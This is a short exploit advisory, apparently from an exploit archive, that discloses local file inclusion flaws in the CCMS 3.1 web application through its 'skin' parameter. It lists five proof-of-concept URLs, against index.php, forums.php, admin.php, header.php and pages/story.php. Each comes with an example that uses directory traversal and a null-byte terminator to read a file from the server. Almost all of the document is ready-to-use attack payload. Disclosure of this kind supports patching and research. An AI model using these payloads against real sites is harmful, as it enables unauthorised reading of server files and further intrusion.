1 ############################################################################################
2 [+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities
3 [+] Discovered By SirGod
4 [+] wWw.MorTal−TeaM.OrG
5 [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
6 ############################################################################################
7
8 [+] Download Script :
9
10 http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar
11
12 [+] Local File Inclusion
13
14 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
15
16 PoC 1 :
17
18 http://[target]/[path]/index.php?skin=[Local File]%00
19
20 Example 1 :
21
22 http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00
23
24
25 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
26
27 PoC 2 :
28
29 http://[target]/[path]/forums.php?skin=[Local File]%00
30
31 Example 2 :
32
33 http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00
34
35
36 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
37
38 PoC 3 :
39
40 http://[target]/[path]/admin.php?skin=[Local File]%00
41
42 Example 3 :
43
44 http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00
45
46 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
47
48 PoC 4 :
49
50 http://[target]/[path]/header.php?skin=[Local File]%00
51
52 Example 4 :
Page 1/2
CCMS 3.1 skin Multiple Local File Inclusion Vulnerabilities
SirGod
10/03/2008
53
54 http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00
55
56 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
57
58 PoC 5 :
59
60 http://[target]/[path]/pages/story.php?skin=[Local File]%00
61
62 Example 5 :
63
64 http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00
6